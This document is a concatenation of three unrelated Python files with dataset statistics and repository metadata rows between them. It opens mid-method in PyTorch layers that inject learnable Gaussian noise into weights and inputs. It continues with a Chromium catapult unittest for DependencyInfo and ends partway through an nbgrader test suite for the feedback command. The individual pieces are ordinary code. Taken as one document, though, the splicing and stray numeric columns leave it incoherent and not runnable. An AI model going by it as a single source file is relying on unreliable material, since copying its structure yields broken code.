        # Perturb the weights with zero-mean Gaussian noise whose std matches
        # the weights' empirical std, scaled by the learnable alpha_w.
        # (self.w_noise is a bool: multiplying by False zeroes the noise.)
        if self.noise_type in ('weight', 'both'):
            with torch.no_grad():
                std = self.weight.std().item()
                noise_weight = self.weight.clone().normal_(0, std)
            noise_weight = self.weight + self.alpha_w * noise_weight * self.w_noise
        else:
            noise_weight = self.weight
        # Same treatment for the inputs, scaled by alpha_i.
        if self.noise_type in ('input', 'both'):
            with torch.no_grad():
                std = input.std().item()
                noise_input = input.clone().normal_(0, std)
            noise_input = input + self.alpha_i * noise_input * self.w_noise
        else:
            noise_input = input
        output = F.linear(noise_input, noise_weight, self.bias)
        return output
class noise_Conv2d(nn.Conv2d):
    """nn.Conv2d with learnable-scale Gaussian noise injected into its weights
    and/or inputs (parametric noise injection).

    :param pni: noise-scale granularity: 'layerwise', 'channelwise' or
        'elementwise'
    :param w_noise: enables the noise term (False zeroes it out)
    :param noise_type: weight or input or both
    :param input_size: shape of the input noise scale, required only for
        pni='elementwise'
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride=1,
                 padding=0, dilation=1,
                 groups=1, bias=True, pni='layerwise', w_noise=True,
                 noise_type=global_noise_type, input_size=None):
        super(noise_Conv2d, self).__init__(in_channels, out_channels,
                                           kernel_size, stride,
                                           padding, dilation, groups, bias)
        self.pni = pni
        self.noise_type = noise_type
        # Fixed: the original compared strings with `is`, which depends on
        # CPython string interning and is not guaranteed to work; use `==`.
        if self.pni == 'layerwise':
            # One scalar noise scale for the whole layer.
            # noise scale for weights
            if self.noise_type in ('weight', 'both'):
                self.alpha_w = nn.Parameter(torch.Tensor([0.25]),
                                            requires_grad=True)
            # noise scale for inputs
            if self.noise_type in ('input', 'both'):
                self.alpha_i = nn.Parameter(torch.Tensor([0.25]),
                                            requires_grad=True)
        elif self.pni == 'channelwise':
            # One scale per output channel (weights) / input channel (inputs),
            # shaped for broadcasting over NCHW tensors.
            self.alpha_w = nn.Parameter(
                torch.ones(self.out_channels).view(-1, 1, 1, 1) * 0.25,
                requires_grad=True)
            self.alpha_i = nn.Parameter(
                torch.ones(self.in_channels).view(-1, 1, 1, 1) * 0.25,
                requires_grad=True)
        elif self.pni == 'elementwise':
            self.alpha_w = nn.Parameter(torch.ones(self.weight.size()) * 0.25,
                                        requires_grad=True)
            self.alpha_i = nn.Parameter(torch.ones(input_size) * 0.25,
                                        requires_grad=True)
        self.w_noise = w_noise

    def forward(self, input):
        # Perturb the weights with zero-mean Gaussian noise whose std matches
        # the weights' empirical std, scaled by the learnable alpha_w.
        # (self.w_noise is a bool: multiplying by False zeroes the noise.)
        if self.noise_type in ('weight', 'both'):
            with torch.no_grad():
                std = self.weight.std().item()
                noise_weight = self.weight.clone().normal_(0, std)
            noise_weight = self.weight + self.alpha_w * noise_weight * self.w_noise
        else:
            noise_weight = self.weight
        # Same treatment for the inputs, scaled by alpha_i.
        if self.noise_type in ('input', 'both'):
            with torch.no_grad():
                std = input.std().item()
                noise_input = input.clone().normal_(0, std)
            noise_input = input + self.alpha_i * noise_input * self.w_noise
        else:
            noise_input = input
        output = F.conv2d(noise_input, noise_weight, self.bias, self.stride,
                          self.padding, self.dilation,
                          self.groups)
        return output
| 37.525547
| 83
| 0.529663
| 610
| 5,141
| 4.254098
| 0.114754
| 0.062428
| 0.073988
| 0.069364
| 0.833141
| 0.816956
| 0.794605
| 0.766089
| 0.766089
| 0.75684
| 0
| 0.018399
| 0.365688
| 5,141
| 136
| 84
| 37.801471
| 0.777369
| 0.042599
| 0
| 0.734694
| 0
| 0
| 0.032963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.05102
| 0
| 0.132653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d594ddeb6eadcdefca599856faefe588e83bdfa9
| 11,232
|
py
|
Python
|
chromium/tools/telemetry/catapult_base/dependency_manager/dependency_info_unittest.py
|
wedataintelligence/vivaldi-source
|
22a46f2c969f6a0b7ca239a05575d1ea2738768c
|
[
"BSD-3-Clause"
] | 27
|
2016-04-27T01:02:03.000Z
|
2021-12-13T08:53:19.000Z
|
chromium/tools/telemetry/catapult_base/dependency_manager/dependency_info_unittest.py
|
wedataintelligence/vivaldi-source
|
22a46f2c969f6a0b7ca239a05575d1ea2738768c
|
[
"BSD-3-Clause"
] | 2
|
2017-03-09T09:00:50.000Z
|
2017-09-21T15:48:20.000Z
|
chromium/tools/telemetry/catapult_base/dependency_manager/dependency_info_unittest.py
|
wedataintelligence/vivaldi-source
|
22a46f2c969f6a0b7ca239a05575d1ea2738768c
|
[
"BSD-3-Clause"
] | 17
|
2016-04-27T02:06:39.000Z
|
2019-12-18T08:07:00.000Z
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from catapult_base import dependency_manager
class DependencyInfoTest(unittest.TestCase):
  """Tests for dependency_manager.DependencyInfo construction and Update()."""

  def testInitRequiredInfo(self):
    """Construction requires dependency, platform and config path; minimal info is stored."""
    # Must have a dependency, platform and file_path.
    self.assertRaises(ValueError, dependency_manager.DependencyInfo,
                      None, None, None)
    self.assertRaises(ValueError, dependency_manager.DependencyInfo,
                      'dep', None, None)
    self.assertRaises(ValueError, dependency_manager.DependencyInfo,
                      None, 'plat', None)
    self.assertRaises(ValueError, dependency_manager.DependencyInfo,
                      None, None, 'config_path')
    # Empty DependencyInfo.
    empty_di = dependency_manager.DependencyInfo('dep', 'plat', 'config_path')
    self.assertEqual('dep', empty_di.dependency)
    self.assertEqual('plat', empty_di.platform)
    self.assertEqual(['config_path'], empty_di.config_paths)
    self.assertFalse(empty_di.has_local_path_info)
    self.assertFalse(empty_di.has_cloud_storage_info)

  def testInitLocalPaths(self):
    """A LocalPathInfo passed positionally is stored; no cloud storage info results."""
    local_path_info = dependency_manager.LocalPathInfo(['path0', 'path1'])
    dep_info = dependency_manager.DependencyInfo(
        'dep', 'platform', 'config_path', local_path_info
    )
    self.assertEqual('dep', dep_info.dependency)
    self.assertEqual('platform', dep_info.platform)
    self.assertEqual(['config_path'], dep_info.config_paths)
    self.assertEqual(local_path_info, dep_info._local_path_info)
    self.assertFalse(dep_info.has_cloud_storage_info)

  def testInitCloudStorageInfo(self):
    """A CloudStorageInfo keyword argument is stored; no local path info results."""
    cs_info = dependency_manager.CloudStorageInfo(
        'cs_bucket', 'cs_hash', 'dowload_path', 'cs_remote_path')
    dep_info = dependency_manager.DependencyInfo(
        'dep', 'platform', 'config_path', cloud_storage_info=cs_info)
    self.assertEqual('dep', dep_info.dependency)
    self.assertEqual('platform', dep_info.platform)
    self.assertEqual(['config_path'], dep_info.config_paths)
    self.assertFalse(dep_info.has_local_path_info)
    self.assertTrue(dep_info.has_cloud_storage_info)
    self.assertEqual(cs_info, dep_info._cloud_storage_info)

  def testInitAllInfo(self):
    """Construction with cloud storage info exposes the expected flags."""
    cs_info = dependency_manager.CloudStorageInfo(
        'cs_bucket', 'cs_hash', 'dowload_path', 'cs_remote_path')
    dep_info = dependency_manager.DependencyInfo(
        'dep', 'platform', 'config_path', cloud_storage_info=cs_info)
    self.assertEqual('dep', dep_info.dependency)
    self.assertEqual('platform', dep_info.platform)
    self.assertEqual(['config_path'], dep_info.config_paths)
    self.assertFalse(dep_info.has_local_path_info)
    self.assertTrue(dep_info.has_cloud_storage_info)

  def testUpdateRequiredArgsConflicts(self):
    """Update() must reject infos whose dependency or platform differs."""
    lp_info = dependency_manager.LocalPathInfo(['path0', 'path2'])
    dep_info1 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path1', local_path_info=lp_info)
    dep_info2 = dependency_manager.DependencyInfo(
        'dep1', 'platform2', 'config_path2', local_path_info=lp_info)
    dep_info3 = dependency_manager.DependencyInfo(
        'dep2', 'platform1', 'config_path3', local_path_info=lp_info)
    self.assertRaises(ValueError, dep_info1.Update, dep_info2)
    self.assertRaises(ValueError, dep_info1.Update, dep_info3)
    self.assertRaises(ValueError, dep_info3.Update, dep_info2)

  def testUpdateMinimumCloudStorageInfo(self):
    """Update() adopts cloud storage info once and rejects a second conflicting one."""
    dep_info1 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path1')
    cs_info2 = dependency_manager.CloudStorageInfo(
        cs_bucket='cs_bucket2', cs_hash='cs_hash2',
        download_path='download_path2', cs_remote_path='cs_remote_path2')
    dep_info2 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path2', cloud_storage_info=cs_info2)
    dep_info3 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path3')
    cs_info4 = dependency_manager.CloudStorageInfo(
        cs_bucket='cs_bucket4', cs_hash='cs_hash4',
        download_path='download_path4', cs_remote_path='cs_remote_path4')
    dep_info4 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path4', cloud_storage_info=cs_info4)
    self.assertEqual('dep1', dep_info1.dependency)
    self.assertEqual('platform1', dep_info1.platform)
    self.assertEqual(['config_path1'], dep_info1.config_paths)
    # First update: dep_info1 takes over dep_info2's cloud storage info.
    dep_info1.Update(dep_info2)
    self.assertFalse(dep_info1.has_local_path_info)
    self.assertEqual('dep1', dep_info1.dependency)
    self.assertEqual('platform1', dep_info1.platform)
    self.assertEqual(['config_path1', 'config_path2'], dep_info1.config_paths)
    cs_info = dep_info1._cloud_storage_info
    self.assertEqual(cs_info, cs_info2)
    self.assertEqual('cs_bucket2', cs_info._cs_bucket)
    self.assertEqual('cs_hash2', cs_info._cs_hash)
    self.assertEqual('download_path2', cs_info._download_path)
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    # Second update with no cloud storage info: paths accumulate, info unchanged.
    dep_info1.Update(dep_info3)
    self.assertEqual('dep1', dep_info1.dependency)
    self.assertEqual('platform1', dep_info1.platform)
    self.assertEqual(['config_path1', 'config_path2', 'config_path3'],
                     dep_info1.config_paths)
    self.assertFalse(dep_info1.has_local_path_info)
    cs_info = dep_info1._cloud_storage_info
    self.assertEqual(cs_info, cs_info2)
    self.assertEqual('cs_bucket2', cs_info._cs_bucket)
    self.assertEqual('cs_hash2', cs_info._cs_hash)
    self.assertEqual('download_path2', cs_info._download_path)
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    # A second, different cloud storage info must be rejected.
    self.assertRaises(ValueError, dep_info1.Update, dep_info4)

  def testUpdateMaxCloudStorageInfo(self):
    """Same as the minimum test, but with archive info and version attached."""
    dep_info1 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path1')
    zip_info2 = dependency_manager.ArchiveInfo(
        'archive_path2', 'unzip_path2', 'path_withing_archive2')
    cs_info2 = dependency_manager.CloudStorageInfo(
        'cs_bucket2', 'cs_hash2', 'download_path2', 'cs_remote_path2',
        version_in_cs='2.1.1', archive_info=zip_info2)
    dep_info2 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path2', cloud_storage_info=cs_info2)
    dep_info3 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path3')
    zip_info4 = dependency_manager.ArchiveInfo(
        'archive_path4', 'unzip_path4', 'path_withing_archive4')
    cs_info4 = dependency_manager.CloudStorageInfo(
        'cs_bucket4', 'cs_hash4', 'download_path4', 'cs_remote_path4',
        version_in_cs='4.2.1', archive_info=zip_info4)
    dep_info4 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path4', cloud_storage_info=cs_info4)
    self.assertEqual('dep1', dep_info1.dependency)
    self.assertEqual('platform1', dep_info1.platform)
    self.assertEqual(['config_path1'], dep_info1.config_paths)
    dep_info1.Update(dep_info2)
    self.assertFalse(dep_info1.has_local_path_info)
    self.assertEqual('dep1', dep_info1.dependency)
    self.assertEqual('platform1', dep_info1.platform)
    self.assertEqual(['config_path1', 'config_path2'], dep_info1.config_paths)
    cs_info = dep_info1._cloud_storage_info
    self.assertEqual(cs_info, cs_info2)
    self.assertEqual('cs_bucket2', cs_info._cs_bucket)
    self.assertEqual('cs_hash2', cs_info._cs_hash)
    self.assertEqual('download_path2', cs_info._download_path)
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    # NOTE(review): the assertion below duplicates the one above in the original.
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    dep_info1.Update(dep_info3)
    self.assertEqual('dep1', dep_info1.dependency)
    self.assertEqual('platform1', dep_info1.platform)
    self.assertEqual(['config_path1', 'config_path2', 'config_path3'],
                     dep_info1.config_paths)
    self.assertFalse(dep_info1.has_local_path_info)
    cs_info = dep_info1._cloud_storage_info
    self.assertEqual(cs_info, cs_info2)
    self.assertEqual('cs_bucket2', cs_info._cs_bucket)
    self.assertEqual('cs_hash2', cs_info._cs_hash)
    self.assertEqual('download_path2', cs_info._download_path)
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    self.assertRaises(ValueError, dep_info1.Update, dep_info4)

  def testUpdateAllInfo(self):
    """Local paths accumulate across updates; cloud storage info stays fixed."""
    lp_info1 = dependency_manager.LocalPathInfo(['path1'])
    dep_info1 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path1', local_path_info=lp_info1)
    cs_info2 = dependency_manager.CloudStorageInfo(
        cs_bucket='cs_bucket2', cs_hash='cs_hash2',
        download_path='download_path2', cs_remote_path='cs_remote_path2')
    lp_info2 = dependency_manager.LocalPathInfo(['path2'])
    dep_info2 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path2', local_path_info=lp_info2,
        cloud_storage_info=cs_info2)
    lp_info3 = dependency_manager.LocalPathInfo(['path3'])
    dep_info3 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path3', local_path_info=lp_info3)
    lp_info4 = dependency_manager.LocalPathInfo(['path4'])
    cs_info4 = dependency_manager.CloudStorageInfo(
        cs_bucket='cs_bucket4', cs_hash='cs_hash4',
        download_path='download_path4', cs_remote_path='cs_remote_path4')
    dep_info4 = dependency_manager.DependencyInfo(
        'dep1', 'platform1', 'config_path4', local_path_info=lp_info4,
        cloud_storage_info=cs_info4)
    self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path1'))
    self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path2'))
    self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path3'))
    self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path4'))
    # Update with dep_info2: gains its cloud storage info and 'path2'.
    dep_info1.Update(dep_info2)
    cs_info = dep_info1._cloud_storage_info
    self.assertEqual(cs_info, cs_info2)
    self.assertEqual('cs_bucket2', cs_info._cs_bucket)
    self.assertEqual('cs_hash2', cs_info._cs_hash)
    self.assertEqual('download_path2', cs_info._download_path)
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path1'))
    self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path2'))
    self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path3'))
    self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path4'))
    # Update with dep_info3: gains 'path3'; cloud storage info unchanged.
    dep_info1.Update(dep_info3)
    cs_info = dep_info1._cloud_storage_info
    self.assertEqual(cs_info, cs_info2)
    self.assertEqual('cs_bucket2', cs_info._cs_bucket)
    self.assertEqual('cs_hash2', cs_info._cs_hash)
    self.assertEqual('download_path2', cs_info._download_path)
    self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
    self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path1'))
    self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path2'))
    self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path3'))
    self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path4'))
    # Conflicting cloud storage info must still be rejected.
    self.assertRaises(ValueError, dep_info1.Update, dep_info4)
| 47.795745
| 78
| 0.750712
| 1,388
| 11,232
| 5.67147
| 0.07781
| 0.120046
| 0.049543
| 0.062246
| 0.83905
| 0.800559
| 0.77312
| 0.749111
| 0.706809
| 0.691311
| 0
| 0.027186
| 0.138711
| 11,232
| 234
| 79
| 48
| 0.786541
| 0.020032
| 0
| 0.725888
| 0
| 0
| 0.149636
| 0.003818
| 0
| 0
| 0
| 0
| 0.48731
| 1
| 0.040609
| false
| 0
| 0.010152
| 0
| 0.055838
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
637f11d7059c137927173cd519a5e44b2644df0b
| 14,284
|
py
|
Python
|
nbgrader/tests/apps/test_nbgrader_feedback.py
|
lgpage/nbgrader
|
609a88b6237611a0cf293415ee25eeee51f19eda
|
[
"BSD-3-Clause-Clear"
] | 1
|
2018-06-18T14:47:01.000Z
|
2018-06-18T14:47:01.000Z
|
nbgrader/tests/apps/test_nbgrader_feedback.py
|
lgpage/nbgrader
|
609a88b6237611a0cf293415ee25eeee51f19eda
|
[
"BSD-3-Clause-Clear"
] | 1
|
2018-10-31T15:54:37.000Z
|
2018-10-31T15:54:37.000Z
|
nbgrader/tests/apps/test_nbgrader_feedback.py
|
lgpage/nbgrader
|
609a88b6237611a0cf293415ee25eeee51f19eda
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import os
import sys
from os.path import join, exists, isfile
from ...utils import remove
from .. import run_nbgrader
from .base import BaseTestApp
class TestNbGraderFeedback(BaseTestApp):
def test_help(self):
    """Does the help display without error?"""
    # Smoke test: the CLI must exit cleanly when asked for full help.
    run_nbgrader(["feedback", "--help-all"])
def test_single_file(self, db, course_dir):
    """Can feedback be generated for an unchanged assignment?"""
    # Register the assignment and the student in the nbgrader config.
    with open("nbgrader_config.py", "a") as fh:
        fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
        fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
    # Release the source notebook, submit it unchanged, and autograde it.
    self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
    run_nbgrader(["assign", "ps1", "--db", db])
    self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
    run_nbgrader(["autograde", "ps1", "--db", db])
    # Generating feedback should produce one HTML report per notebook.
    run_nbgrader(["feedback", "ps1", "--db", db])
    assert exists(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
def test_force(self, db, course_dir):
    """Ensure the force option works properly"""
    # Register the assignment and the student in the nbgrader config.
    with open("nbgrader_config.py", "a") as fh:
        fh.write("""c.CourseDirectory.db_assignments = [dict(name="ps1")]\n""")
        fh.write("""c.CourseDirectory.db_students = [dict(id="foo")]\n""")
    # Set up source with supplemental files, release, submit, and autograde.
    self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
    self._make_file(join(course_dir, "source", "ps1", "foo.txt"), "foo")
    self._make_file(join(course_dir, "source", "ps1", "data", "bar.txt"), "bar")
    run_nbgrader(["assign", "ps1", "--db", db])
    self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
    self._make_file(join(course_dir, "submitted", "foo", "ps1", "foo.txt"), "foo")
    self._make_file(join(course_dir, "submitted", "foo", "ps1", "data", "bar.txt"), "bar")
    run_nbgrader(["autograde", "ps1", "--db", db])
    # A compiled-python file planted in the autograded output must be excluded.
    self._make_file(join(course_dir, "autograded", "foo", "ps1", "blah.pyc"), "asdf")
    run_nbgrader(["feedback", "ps1", "--db", db])
    assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
    assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
    assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
    assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
    # check that it skips the existing directory
    remove(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
    run_nbgrader(["feedback", "ps1", "--db", db])
    assert not isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
    # force overwrite the supplemental files
    run_nbgrader(["feedback", "ps1", "--db", db, "--force"])
    assert isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
    # force overwrite
    remove(join(course_dir, "autograded", "foo", "ps1", "foo.txt"))
    run_nbgrader(["feedback", "ps1", "--db", db, "--force"])
    assert isfile(join(course_dir, "feedback", "foo", "ps1", "p1.html"))
    assert not isfile(join(course_dir, "feedback", "foo", "ps1", "foo.txt"))
    assert isfile(join(course_dir, "feedback", "foo", "ps1", "data", "bar.txt"))
    assert not isfile(join(course_dir, "feedback", "foo", "ps1", "blah.pyc"))
def test_filter_notebook(self, db, course_dir):
    """Does feedback filter by notebook properly?"""
    with open("nbgrader_config.py", "a") as fh:
        fh.write('c.CourseDirectory.db_assignments = [dict(name="ps1")]\n')
        fh.write('c.CourseDirectory.db_students = [dict(id="foo")]\n')

    # Hoist the directories that every step below touches.
    source_dir = join(course_dir, "source", "ps1")
    submitted_dir = join(course_dir, "submitted", "foo", "ps1")
    feedback_dir = join(course_dir, "feedback", "foo", "ps1")

    self._copy_file(join("files", "submitted-unchanged.ipynb"), join(source_dir, "p1.ipynb"))
    self._make_file(join(source_dir, "foo.txt"), "foo")
    self._make_file(join(source_dir, "data", "bar.txt"), "bar")
    run_nbgrader(["assign", "ps1", "--db", db])

    self._copy_file(join("files", "submitted-unchanged.ipynb"), join(submitted_dir, "p1.ipynb"))
    self._make_file(join(submitted_dir, "foo.txt"), "foo")
    self._make_file(join(submitted_dir, "data", "bar.txt"), "bar")
    self._make_file(join(submitted_dir, "blah.pyc"), "asdf")
    run_nbgrader(["autograde", "ps1", "--db", db])

    run_nbgrader(["feedback", "ps1", "--db", db, "--notebook", "p1"])
    assert isfile(join(feedback_dir, "p1.html"))
    assert isfile(join(feedback_dir, "foo.txt"))
    assert isfile(join(feedback_dir, "data", "bar.txt"))
    assert not isfile(join(feedback_dir, "blah.pyc"))

    # check that removing the notebook still causes it to run
    remove(join(feedback_dir, "p1.html"))
    remove(join(feedback_dir, "foo.txt"))
    run_nbgrader(["feedback", "ps1", "--db", db, "--notebook", "p1"])
    assert isfile(join(feedback_dir, "p1.html"))
    assert isfile(join(feedback_dir, "foo.txt"))
    assert isfile(join(feedback_dir, "data", "bar.txt"))
    assert not isfile(join(feedback_dir, "blah.pyc"))

    # check that running it again doesn't do anything
    remove(join(feedback_dir, "foo.txt"))
    run_nbgrader(["feedback", "ps1", "--db", db, "--notebook", "p1"])
    assert isfile(join(feedback_dir, "p1.html"))
    assert not isfile(join(feedback_dir, "foo.txt"))
    assert isfile(join(feedback_dir, "data", "bar.txt"))
    assert not isfile(join(feedback_dir, "blah.pyc"))

    # check that removing the notebook doesn't cause it to run
    remove(join(feedback_dir, "p1.html"))
    run_nbgrader(["feedback", "ps1", "--db", db])
    assert not isfile(join(feedback_dir, "p1.html"))
    assert not isfile(join(feedback_dir, "foo.txt"))
    assert isfile(join(feedback_dir, "data", "bar.txt"))
    assert not isfile(join(feedback_dir, "blah.pyc"))
def test_permissions(self, course_dir):
    """Are permissions properly set?"""
    with open("nbgrader_config.py", "a") as fh:
        fh.write('c.CourseDirectory.db_assignments = [dict(name="ps1")]\n')
        fh.write('c.CourseDirectory.db_students = [dict(id="foo")]\n')
    self._empty_notebook(join(course_dir, "source", "ps1", "foo.ipynb"))
    run_nbgrader(["assign", "ps1"])
    self._empty_notebook(join(course_dir, "submitted", "foo", "ps1", "foo.ipynb"))
    run_nbgrader(["autograde", "ps1"])
    run_nbgrader(["feedback", "ps1"])

    # Windows reports 666 where POSIX systems report 644.
    perms = '666' if sys.platform == 'win32' else '644'
    html = join(course_dir, "feedback", "foo", "ps1", "foo.html")
    assert isfile(html)
    assert self._get_permissions(html) == perms
def test_custom_permissions(self, course_dir):
    """Are custom permissions properly set?"""
    with open("nbgrader_config.py", "a") as fh:
        fh.write('c.CourseDirectory.db_assignments = [dict(name="ps1")]\n')
        fh.write('c.CourseDirectory.db_students = [dict(id="foo")]\n')
    self._empty_notebook(join(course_dir, "source", "ps1", "foo.ipynb"))
    run_nbgrader(["assign", "ps1"])
    self._empty_notebook(join(course_dir, "submitted", "foo", "ps1", "foo.ipynb"))
    run_nbgrader(["autograde", "ps1"])

    # Override the default permissions via the FeedbackApp traitlet.
    run_nbgrader(["feedback", "ps1", "--FeedbackApp.permissions=444"])
    html = join(course_dir, "feedback", "foo", "ps1", "foo.html")
    assert isfile(html)
    assert self._get_permissions(html) == '444'
def test_force_single_notebook(self, course_dir):
    """Does --notebook with --force regenerate only the requested notebook?"""
    with open("nbgrader_config.py", "a") as fh:
        fh.write('c.CourseDirectory.db_assignments = [dict(name="ps1")]\n')
        fh.write('c.CourseDirectory.db_students = [dict(id="foo")]\n')
    for nb in ("p1.ipynb", "p2.ipynb"):
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", nb))
    run_nbgrader(["assign", "ps1"])
    for nb in ("p1.ipynb", "p2.ipynb"):
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", nb))
    run_nbgrader(["autograde", "ps1"])
    run_nbgrader(["feedback", "ps1"])

    feedback_dir = join(course_dir, "feedback", "foo", "ps1")
    assert exists(join(feedback_dir, "p1.html"))
    assert exists(join(feedback_dir, "p2.html"))
    p1 = self._file_contents(join(feedback_dir, "p1.html"))
    p2 = self._file_contents(join(feedback_dir, "p2.html"))

    # Blank out both autograded notebooks, then force-regenerate only p1:
    # p1's feedback must change while p2's stays byte-identical.
    self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p1.ipynb"))
    self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p2.ipynb"))
    run_nbgrader(["feedback", "ps1", "--notebook", "p1", "--force"])
    assert exists(join(feedback_dir, "p1.html"))
    assert exists(join(feedback_dir, "p2.html"))
    assert p1 != self._file_contents(join(feedback_dir, "p1.html"))
    assert p2 == self._file_contents(join(feedback_dir, "p2.html"))
def test_update_newer(self, course_dir):
    """Is feedback regenerated when the autograded copy carries a newer timestamp?"""
    with open("nbgrader_config.py", "a") as fh:
        fh.write('c.CourseDirectory.db_assignments = [dict(name="ps1")]\n')
        fh.write('c.CourseDirectory.db_students = [dict(id="foo")]\n')
    self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
    run_nbgrader(["assign", "ps1"])
    self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
    self._make_file(join(course_dir, "submitted", "foo", "ps1", "timestamp.txt"), "2015-02-02 15:58:23.948203 PST")
    run_nbgrader(["autograde", "ps1"])
    run_nbgrader(["feedback", "ps1"])

    feedback_dir = join(course_dir, "feedback", "foo", "ps1")
    assert isfile(join(feedback_dir, "p1.html"))
    assert isfile(join(feedback_dir, "timestamp.txt"))
    assert self._file_contents(join(feedback_dir, "timestamp.txt")) == "2015-02-02 15:58:23.948203 PST"
    p = self._file_contents(join(feedback_dir, "p1.html"))

    # Bump the autograded timestamp one hour later: feedback should be redone
    # even without --force.
    self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p1.ipynb"))
    self._make_file(join(course_dir, "autograded", "foo", "ps1", "timestamp.txt"), "2015-02-02 16:58:23.948203 PST")
    run_nbgrader(["feedback", "ps1"])
    assert isfile(join(feedback_dir, "p1.html"))
    assert isfile(join(feedback_dir, "timestamp.txt"))
    assert self._file_contents(join(feedback_dir, "timestamp.txt")) == "2015-02-02 16:58:23.948203 PST"
    assert p != self._file_contents(join(feedback_dir, "p1.html"))
def test_update_newer_single_notebook(self, course_dir):
    """With --notebook, does a newer timestamp regenerate only the requested notebook?"""
    with open("nbgrader_config.py", "a") as fh:
        fh.write('c.CourseDirectory.db_assignments = [dict(name="ps1")]\n')
        fh.write('c.CourseDirectory.db_students = [dict(id="foo")]\n')
    for nb in ("p1.ipynb", "p2.ipynb"):
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", nb))
    run_nbgrader(["assign", "ps1"])
    for nb in ("p1.ipynb", "p2.ipynb"):
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "submitted", "foo", "ps1", nb))
    self._make_file(join(course_dir, "submitted", "foo", "ps1", "timestamp.txt"), "2015-02-02 15:58:23.948203 PST")
    run_nbgrader(["autograde", "ps1"])
    run_nbgrader(["feedback", "ps1"])

    feedback_dir = join(course_dir, "feedback", "foo", "ps1")
    assert exists(join(feedback_dir, "p1.html"))
    assert exists(join(feedback_dir, "p2.html"))
    assert isfile(join(feedback_dir, "timestamp.txt"))
    assert self._file_contents(join(feedback_dir, "timestamp.txt")) == "2015-02-02 15:58:23.948203 PST"
    p1 = self._file_contents(join(feedback_dir, "p1.html"))
    p2 = self._file_contents(join(feedback_dir, "p2.html"))

    # Newer autograded timestamp, but only p1 is requested: p1's feedback
    # must be regenerated while p2's stays byte-identical.
    self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p1.ipynb"))
    self._empty_notebook(join(course_dir, "autograded", "foo", "ps1", "p2.ipynb"))
